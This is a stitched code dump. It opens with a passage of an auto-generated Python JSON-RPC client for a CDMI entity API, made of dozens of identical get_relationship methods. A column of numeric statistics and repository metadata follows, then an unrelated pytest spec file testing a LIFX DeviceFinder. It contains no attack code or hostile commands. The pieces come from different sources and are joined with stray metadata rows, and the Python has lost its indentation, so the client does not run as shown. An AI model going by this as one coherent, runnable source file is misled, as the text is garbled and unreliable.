def get_relationship_IsShownOn(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsShownOn',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server: ' +
str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_StrainParentOf(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_StrainParentOf',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server: ' +
str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_DerivedFromStrain(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_DerivedFromStrain',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server: ' +
str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_StrainWithPlatforms(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_StrainWithPlatforms',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server: ' +
str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_PlatformForStrain(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_PlatformForStrain',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server: ' +
str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_StrainWithSample(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_StrainWithSample',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server: ' +
str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_SampleForStrain(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_SampleForStrain',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server: ' +
str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_Submitted(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_Submitted',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server: ' +
str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_WasSubmittedBy(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_WasSubmittedBy',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server: ' +
str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_SupersedesAlignment(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_SupersedesAlignment',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server: ' +
str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsSupersededByAlignment(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsSupersededByAlignment',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server: ' +
str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_SupersedesTree(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_SupersedesTree',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server: ' +
str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsSupersededByTree(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsSupersededByTree',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server: ' +
str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_Treed(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_Treed',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server: ' +
str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsTreeFrom(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsTreeFrom',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server: ' +
str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_UsedIn(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_UsedIn',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server: ' +
str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_HasMedia(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_HasMedia',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server: ' +
str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_Uses(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_Uses',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server: ' +
str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_IsUsedBy(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_IsUsedBy',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server: ' +
str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_UsesCodons(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_UsesCodons',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server: ' +
str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
def get_relationship_AreCodonsFor(self, ids, from_fields, rel_fields, to_fields):
arg_hash = {'method': 'CDMI_EntityAPI.get_relationship_AreCodonsFor',
'params': [ids, from_fields, rel_fields, to_fields],
'version': '1.1',
'id': str(random.random())[2:]
}
body = json.dumps(arg_hash, cls=JSONObjectEncoder)
try:
request = urllib2.Request(self.url, body, self._headers)
ret = urllib2.urlopen(request, timeout=self.timeout)
except HTTPError as h:
if _CT in h.headers and h.headers[_CT] == _AJ:
b = h.read()
err = json.loads(b)
if 'error' in err:
raise ServerError(**err['error'])
else: # this should never happen... but if it does
se = ServerError('Unknown', 0, b)
se.httpError = h
# h.read() will return '' in the calling code.
raise se
else:
raise h
if ret.code != httplib.OK:
raise URLError('Received bad response code from server: ' +
str(ret.code))
resp = json.loads(ret.read())
if 'result' in resp:
return resp['result'][0]
else:
raise ServerError('Unknown', 0, 'An unknown server error occurred')
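# Usage sketch (hypothetical values; construction of the client object is not
# shown in this excerpt and is an assumption):
#
#     rows = cdmi.get_relationship_Treed(
#         ['kb|g.0'],          # entity ids to start from
#         ['id'],              # fields wanted from the source entity
#         [],                  # fields wanted from the relationship itself
#         ['id'])              # fields wanted from the target entity
#
# Every method above posts the same JSON-RPC 1.1 envelope and returns
# resp['result'][0] on success.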
| 40.481647
| 104
| 0.490764
| 95,866
| 898,814
| 4.507542
| 0.00725
| 0.026222
| 0.055313
| 0.024745
| 0.958854
| 0.958127
| 0.957095
| 0.955617
| 0.955147
| 0.952333
| 0
| 0.009484
| 0.403329
| 898,814
| 22,202
| 105
| 40.48347
| 0.796266
| 0.062383
| 0
| 0.895534
| 1
| 0
| 0.129543
| 0.030363
| 0
| 0
| 0
| 0
| 0.000526
| 0
| null | null | 0.001105
| 0.000684
| null | null | 0.000105
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
5f2db84bcfe053322ca4507b2b70fecde345791c
| 21,922
|
py
|
Python
|
modules/tests/photons_control_tests/device_finder/test_special_reference.py
|
Djelibeybi/photons
|
bc0aa91771d8e88fd3c691fb58f18cb876f292ec
|
[
"MIT"
] | 51
|
2020-07-03T08:34:48.000Z
|
2022-03-16T10:56:08.000Z
|
modules/tests/photons_control_tests/device_finder/test_special_reference.py
|
delfick/photons
|
bc0aa91771d8e88fd3c691fb58f18cb876f292ec
|
[
"MIT"
] | 81
|
2020-07-03T08:13:59.000Z
|
2022-03-31T23:02:54.000Z
|
modules/tests/photons_control_tests/device_finder/test_special_reference.py
|
Djelibeybi/photons
|
bc0aa91771d8e88fd3c691fb58f18cb876f292ec
|
[
"MIT"
] | 8
|
2020-07-24T23:48:20.000Z
|
2021-05-24T17:20:16.000Z
|
# coding: spec
from photons_control.device_finder import DeviceFinder, Filter, Finder
from photons_app.special import SpecialReference
from photons_app import helpers as hp
from photons_messages import DeviceMessages, LightMessages, DiscoveryMessages
from photons_products import Products
from unittest import mock
import binascii
import pytest
@pytest.fixture(autouse=True)
def set_async_timeout(request):
request.applymarker(pytest.mark.async_timeout(10))
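# autouse fixture: applies a 10 second async timeout marker to every test in
# this module.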
describe "DeviceFinder":
it "takes in filter":
fltr = Filter.empty()
reference = DeviceFinder(fltr)
assert reference.fltr is fltr
assert reference.finder is None
assert isinstance(reference, SpecialReference)
it "can take in a finder":
fltr = Filter.empty()
finder = mock.Mock(name="finder")
reference = DeviceFinder(fltr, finder=finder)
assert reference.fltr is fltr
assert reference.finder is finder
assert isinstance(reference, SpecialReference)
describe "usage":
@pytest.fixture()
def V(self):
class V:
fltr = mock.NonCallableMock(name="fltr", spec=[])
sender = mock.NonCallableMock(name="sender", spec=[])
@hp.memoized_property
def finder(s):
finder = mock.Mock(name="finder", spec=["finish"])
finder.finish = pytest.helpers.AsyncMock(name="finish")
return finder
return V()
describe "a_finder context manager":
async it "uses the finder on the reference if it exists", V:
reference = DeviceFinder(V.fltr, finder=V.finder)
async with reference.a_finder(V.sender) as f:
assert f is V.finder
V.finder.finish.assert_not_called()
V.finder.finish.assert_not_called()
async it "creates it's own finder if one isn't on the reference", V:
FakeFinder = mock.Mock(name="Finder", return_value=V.finder, spec=[])
reference = DeviceFinder(V.fltr)
with mock.patch("photons_control.device_finder.Finder", FakeFinder):
async with reference.a_finder(V.sender) as f:
assert reference.finder is None
assert f is V.finder
V.finder.finish.assert_not_called()
V.finder.finish.assert_called_once_with(None, None, None)
FakeFinder.assert_called_once_with(V.sender)
describe "info":
async it "yields devices from the finder", V:
called = []
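# Stand-in a_finder context manager: records how it is entered and always
# hands back the mocked V.finder.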
class a_finder:
def __init__(s, sender):
called.append("got_sender")
assert sender is V.sender
async def __aenter__(s):
called.append("making_finder")
return V.finder
async def __aexit__(s, exc_typ, exc, tb):
pass
reference = DeviceFinder(V.fltr)
d1 = mock.Mock(name="d1")
d2 = mock.Mock(name="d2")
async def info(f):
called.append("info_start")
assert f is V.fltr
called.append("send_d1")
yield d1
called.append("send_d2")
yield d2
called.append("info_done")
V.finder.info = pytest.helpers.MagicAsyncMock(name="info", side_effect=info)
found = []
with mock.patch.object(reference, "a_finder", a_finder):
async for device in reference.info(V.sender):
called.append(("got_device", device))
found.append(device)
assert called == [
"got_sender",
"making_finder",
"info_start",
"send_d1",
("got_device", d1),
"send_d2",
("got_device", d2),
"info_done",
]
assert found == [d1, d2]
describe "serials":
async it "yields devices from the finder", V:
called = []
class a_finder:
def __init__(s, sender):
called.append("got_sender")
assert sender is V.sender
async def __aenter__(s):
called.append("making_finder")
return V.finder
async def __aexit__(s, exc_typ, exc, tb):
pass
reference = DeviceFinder(V.fltr)
d1 = mock.Mock(name="d1")
d2 = mock.Mock(name="d2")
async def find(f):
called.append("find_start")
assert f is V.fltr
called.append("send_d1")
yield d1
called.append("send_d2")
yield d2
called.append("find_done")
V.finder.find = pytest.helpers.MagicAsyncMock(name="find", side_effect=find)
found = []
with mock.patch.object(reference, "a_finder", a_finder):
async for device in reference.serials(V.sender):
called.append(("got_device", device))
found.append(device)
assert called == [
"got_sender",
"making_finder",
"find_start",
"send_d1",
("got_device", d1),
"send_d2",
("got_device", d2),
"find_done",
]
assert found == [d1, d2]
describe "Proxying Filter classmethods":
@pytest.fixture()
def fltr(self):
return Filter.from_kwargs(label="kitchen", cap=["matrix", "chain"])
it "supports from_json_str", V, fltr:
reference = DeviceFinder.from_json_str(
'{"label": "kitchen", "cap": ["matrix", "chain"]}'
)
assert reference.fltr == fltr
assert reference.finder is None
reference = DeviceFinder.from_json_str(
'{"label": "kitchen", "cap": ["matrix", "chain"]}', finder=V.finder
)
assert reference.fltr == fltr
assert reference.finder is V.finder
it "supports from_key_value_str", V, fltr:
reference = DeviceFinder.from_key_value_str("label=kitchen cap=matrix,chain")
assert reference.fltr == fltr
assert reference.finder is None
reference = DeviceFinder.from_key_value_str(
"label=kitchen cap=matrix,chain", finder=V.finder
)
assert reference.fltr == fltr
assert reference.finder is V.finder
it "supports from_url_str", V, fltr:
reference = DeviceFinder.from_url_str("label=kitchen&cap=matrix&cap=chain")
assert reference.fltr == fltr
assert reference.finder is None
reference = DeviceFinder.from_url_str(
"label=kitchen&cap=matrix&cap=chain", finder=V.finder
)
assert reference.fltr == fltr
assert reference.finder is V.finder
it "supports from_kwargs", V, fltr:
reference = DeviceFinder.from_kwargs(label="kitchen", cap=["matrix", "chain"])
assert reference.fltr == fltr
assert reference.finder is None
reference = DeviceFinder.from_kwargs(
label="kitchen", cap=["matrix", "chain"], finder=V.finder
)
assert reference.fltr == fltr
assert reference.finder is V.finder
it "supports empty", V, fltr:
for ri, rd in ((False, False), (True, True), (True, False), (False, True)):
expected = Filter.empty(refresh_info=ri, refresh_discovery=rd)
reference = DeviceFinder.empty(refresh_info=ri, refresh_discovery=rd)
assert reference.fltr == expected
assert reference.finder is None
reference = DeviceFinder.empty(
refresh_info=ri, refresh_discovery=rd, finder=V.finder
)
assert reference.fltr == expected
assert reference.finder is V.finder
reference = DeviceFinder.empty()
assert reference.fltr == Filter.empty(refresh_info=False, refresh_discovery=False)
assert reference.finder is None
reference = DeviceFinder.empty(finder=V.finder)
assert reference.fltr == Filter.empty(refresh_info=False, refresh_discovery=False)
assert reference.finder is V.finder
it "supports from_options", V, fltr:
reference = DeviceFinder.from_options(
{"label": "kitchen", "cap": ["matrix", "chain"]}
)
assert reference.fltr == fltr
assert reference.finder is None
reference = DeviceFinder.from_options(
{"label": "kitchen", "cap": ["matrix", "chain"]}, finder=V.finder
)
assert reference.fltr == fltr
assert reference.finder is V.finder
describe "finding devices":
@pytest.fixture()
async def V(self, final_future):
class V:
serials = ["d073d5000001", "d073d5000002", "d073d5000003"]
devices = pytest.helpers.mimic()
d1 = devices.add("d1")(serials[0], Products.LCM3_TILE, hp.Firmware(3, 50))
d2 = devices.add("d2")(
serials[1], Products.LCM2_Z, hp.Firmware(2, 80), value_store=dict(zones=[])
)
d3 = devices.add("d3")(
serials[2],
Products.LCM2_A19,
hp.Firmware(2, 80),
value_store=dict(
firmware=hp.Firmware(2, 80),
group={"identity": "aa", "label": "g1", "updated_at": 42},
location={"identity": "bb", "label": "l1", "updated_at": 56},
),
)
v = V()
async with V.devices.for_test(final_future) as sender:
v.sender = sender
yield v
async it "can get serials and info", V:
reference = DeviceFinder.empty()
found, ss = await reference.find(V.sender, timeout=5)
reference.raise_on_missing(found)
assert sorted(list(found)) == sorted(binascii.unhexlify(s)[:6] for s in ss)
assert ss == sorted(V.serials)
for device in V.devices:
V.devices.store(device).assertIncoming(DiscoveryMessages.GetService())
V.devices.store(device).clear()
reference = DeviceFinder.from_kwargs(label="kitchen")
found, ss = await reference.find(V.sender, timeout=5)
reference.raise_on_missing(found)
assert sorted(list(found)) == sorted(binascii.unhexlify(s)[:6] for s in ss)
assert ss == []
for device in V.devices:
V.devices.store(device).assertIncoming(
DiscoveryMessages.GetService(), LightMessages.GetColor()
)
V.devices.store(device).clear()
await V.d3.change_one("label", "kitchen", event=None)
reference = DeviceFinder.from_kwargs(label="kitchen")
found, ss = await reference.find(V.sender, timeout=5)
reference.raise_on_missing(found)
assert sorted(list(found)) == sorted(binascii.unhexlify(s)[:6] for s in ss)
assert ss == [V.d3.serial]
for device in V.devices:
V.devices.store(device).assertIncoming(
DiscoveryMessages.GetService(), LightMessages.GetColor()
)
V.devices.store(device).clear()
reference = DeviceFinder.from_kwargs(cap="matrix")
found, ss = await reference.find(V.sender, timeout=5)
reference.raise_on_missing(found)
assert sorted(list(found)) == sorted(binascii.unhexlify(s)[:6] for s in ss)
assert ss == [V.d1.serial]
for device in V.devices:
V.devices.store(device).assertIncoming(
DiscoveryMessages.GetService(), DeviceMessages.GetVersion()
)
V.devices.store(device).clear()
reference = DeviceFinder.from_kwargs(cap=["matrix", "multizone"])
found, ss = await reference.find(V.sender, timeout=5)
reference.raise_on_missing(found)
assert sorted(list(found)) == sorted(binascii.unhexlify(s)[:6] for s in ss)
assert ss == [V.d1.serial, V.d2.serial]
for device in V.devices:
V.devices.store(device).assertIncoming(
DiscoveryMessages.GetService(), DeviceMessages.GetVersion()
)
V.devices.store(device).clear()
reference = DeviceFinder.from_kwargs(cap=["not_matrix"], label="kitchen")
found, ss = await reference.find(V.sender, timeout=5)
reference.raise_on_missing(found)
assert sorted(list(found)) == sorted(binascii.unhexlify(s)[:6] for s in ss)
assert ss == [V.d3.serial]
for device in V.devices:
V.devices.store(device).assertIncoming(
DiscoveryMessages.GetService(),
LightMessages.GetColor(),
DeviceMessages.GetVersion(),
)
V.devices.store(device).clear()
